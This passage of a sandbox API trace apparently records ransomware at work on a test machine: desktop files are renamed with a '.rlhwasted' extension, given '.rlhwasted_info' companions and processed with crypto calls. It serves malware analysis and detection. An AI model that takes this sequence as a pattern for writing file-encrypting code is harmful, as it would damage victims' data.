HALPmcxz\\Desktop\\HcQG.jpg.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hcqg.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0187.049] WriteFile (in: hFile=0x124, lpBuffer=0x708d90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x708d90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0187.050] SetEndOfFile (hFile=0x124) returned 1 [0187.050] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.050] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0187.050] lstrcpyW (in: lpString1=0x6ee4bc, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.050] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HcQG.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hcqg.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HcQG.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hcqg.jpg.rlhwasted")) returned 1 [0187.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HcQG.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hcqg.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0187.051] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0187.051] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x6cf [0187.052] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6cf) returned 0x6a0000 [0187.052] CloseHandle (hObject=0x108) returned 1 [0187.054] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0187.055] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0187.055] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.055] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0187.056] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0187.056] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.070] SetEndOfFile (hFile=0x124) returned 1 [0187.072] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0187.072] CloseHandle (hObject=0x124) returned 1 [0187.074] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0187.074] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef8c8 | out: hHeap=0x6b0000) returned 1 [0187.074] _aulldvrm () returned 0x0 [0187.074] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0187.075] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0187.075] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.075] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ITXLUx6l-vHm0EE8Zu.flv") returned 64 [0187.075] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28a) returned 0x6ee458 [0187.076] lstrcpyW (in: lpString1=0x6ee4d8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.076] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x708d90 [0187.076] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0187.077] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x708d90 | out: pbBuffer=0x708d90) returned 1 [0187.077] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ITXLUx6l-vHm0EE8Zu.flv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\itxlux6l-vhm0ee8zu.flv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0187.077] WriteFile (in: hFile=0x124, lpBuffer=0x708d90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x708d90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0187.078] SetEndOfFile (hFile=0x124) returned 1 [0187.079] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.079] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0187.079] lstrcpyW (in: lpString1=0x6ee4d8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ITXLUx6l-vHm0EE8Zu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\itxlux6l-vhm0ee8zu.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ITXLUx6l-vHm0EE8Zu.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\itxlux6l-vhm0ee8zu.flv.rlhwasted")) returned 1 [0187.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ITXLUx6l-vHm0EE8Zu.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\itxlux6l-vhm0ee8zu.flv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0187.080] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0187.080] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x1d86 [0187.080] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d86) returned 0x6a0000 [0187.080] CloseHandle (hObject=0x10c) returned 1 [0187.082] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0187.083] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0187.083] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.083] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0187.084] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0187.084] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.128] SetEndOfFile (hFile=0x124) returned 1 [0187.130] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0187.130] CloseHandle (hObject=0x124) returned 1 [0187.132] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0187.132] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef988 | out: hHeap=0x6b0000) returned 1 [0187.132] _aulldvrm () returned 0x0 [0187.132] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0187.134] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0187.134] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.134] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LKN9Rc0.odp") returned 53 [0187.134] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x274) returned 0x6ee458 [0187.134] lstrcpyW (in: lpString1=0x6ee4c2, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.134] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x708d90 [0187.134] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0187.135] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x708d90 | out: pbBuffer=0x708d90) returned 1 [0187.135] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LKN9Rc0.odp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lkn9rc0.odp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0187.136] WriteFile (in: hFile=0x124, lpBuffer=0x708d90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x708d90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0187.137] SetEndOfFile (hFile=0x124) returned 1 [0187.138] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.138] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0187.138] lstrcpyW (in: lpString1=0x6ee4c2, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LKN9Rc0.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lkn9rc0.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LKN9Rc0.odp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lkn9rc0.odp.rlhwasted")) returned 1 [0187.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LKN9Rc0.odp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lkn9rc0.odp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0187.139] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0187.139] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x13a8c [0187.139] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a8c) returned 0xb00000 [0187.139] CloseHandle (hObject=0x10c) returned 1 [0187.145] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0187.146] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0187.146] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.146] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0187.148] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0187.148] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.158] SetEndOfFile (hFile=0x124) returned 1 [0187.160] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0187.160] CloseHandle (hObject=0x124) returned 1 [0187.161] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0187.161] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f0010 | out: hHeap=0x6b0000) returned 1 [0187.162] _aulldvrm () returned 0x0 [0187.162] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0187.197] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0187.197] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.197] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m7sBTfXjQMUaKv2uDd.swf") returned 64 [0187.197] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28a) returned 0x6d4580 [0187.197] lstrcpyW (in: lpString1=0x6d4600, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.197] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0187.197] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0187.198] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0187.198] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m7sBTfXjQMUaKv2uDd.swf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m7sbtfxjqmuakv2udd.swf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0187.241] WriteFile (in: hFile=0x128, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0187.242] SetEndOfFile (hFile=0x128) returned 1 [0187.243] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.243] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.243] lstrcpyW (in: lpString1=0x6d4600, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m7sBTfXjQMUaKv2uDd.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m7sbtfxjqmuakv2udd.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m7sBTfXjQMUaKv2uDd.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m7sbtfxjqmuakv2udd.swf.rlhwasted")) returned 1 [0187.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m7sBTfXjQMUaKv2uDd.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m7sbtfxjqmuakv2udd.swf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0187.245] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0187.245] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xbd33 [0187.245] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbd33) returned 0x6a0000 [0187.245] CloseHandle (hObject=0x10c) returned 1 [0187.248] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0187.249] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0187.249] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.249] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0187.249] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0187.250] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.258] SetEndOfFile (hFile=0x128) returned 1 [0187.261] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.261] CloseHandle (hObject=0x128) returned 1 [0187.263] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0187.263] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa68 | out: hHeap=0x6b0000) returned 1 [0187.263] _aulldvrm () returned 0x0 [0187.263] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0187.264] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0187.264] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.264] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\izeYk0E0EfOJGl6jxAME.png") returned 90 [0187.264] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2be) returned 0x6d4580 [0187.265] lstrcpyW (in: lpString1=0x6d4634, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.265] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0187.265] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0187.266] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0187.266] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\izeYk0E0EfOJGl6jxAME.png.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\izeyk0e0efojgl6jxame.png.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0187.266] WriteFile (in: hFile=0x128, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0187.267] SetEndOfFile (hFile=0x128) returned 1 [0187.267] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.267] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.267] lstrcpyW (in: lpString1=0x6d4634, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.267] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\izeYk0E0EfOJGl6jxAME.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\izeyk0e0efojgl6jxame.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\izeYk0E0EfOJGl6jxAME.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\izeyk0e0efojgl6jxame.png.rlhwasted")) returned 1 [0187.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\izeYk0E0EfOJGl6jxAME.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\izeyk0e0efojgl6jxame.png.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0187.268] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0187.268] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x221a [0187.268] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x221a) returned 0x6a0000 [0187.268] CloseHandle (hObject=0x108) returned 1 [0187.319] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0187.320] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0187.320] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.320] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0187.321] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0187.321] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.332] SetEndOfFile (hFile=0x128) returned 1 [0187.335] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0187.335] CloseHandle (hObject=0x128) returned 1 [0187.337] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0187.337] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fc6f8 | out: hHeap=0x6b0000) returned 1 [0187.337] _aulldvrm () returned 0x0 [0187.337] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0187.338] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0187.339] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.339] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\pyMW0 oMh.png") returned 79 [0187.339] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a8) returned 0x6d4580 [0187.339] lstrcpyW (in: lpString1=0x6d461e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.339] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef298 [0187.339] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0187.340] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef298 | out: pbBuffer=0x6ef298) returned 1 [0187.340] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.340] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\pyMW0 oMh.png.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\pymw0 omh.png.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0187.359] WriteFile (in: hFile=0x104, lpBuffer=0x6ef298*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef298*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0187.360] SetEndOfFile (hFile=0x104) returned 1 [0187.360] SetFilePointer (in: 